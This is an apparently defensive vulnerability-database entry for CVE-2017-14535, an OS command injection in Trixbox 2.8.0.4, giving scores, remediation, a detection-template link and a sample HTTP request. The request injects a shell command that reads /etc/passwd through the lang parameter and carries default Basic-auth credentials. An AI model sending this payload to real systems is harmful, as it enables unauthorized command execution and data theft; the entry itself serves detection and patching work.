🔙 목록으로 돌아가기

CVE-2017-14535: Trixbox - 2.8.0.4 OS Command Injection

TitleTrixbox - 2.8.0.4 OS Command Injection
Authorpikpikcu
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
RemediationUpgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor.
CVSS Score8.8
EPSS Score0.91276
CVE IDCVE-2017-14535
CWE IDCWE-78
Tags cve cve2017 trixbox rce injection edb netfortris vuln

🔍 Vulnerability Description

Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.

🌐 HTTP Request

GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Cache-Control: max-age=0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-14535.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-14535.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A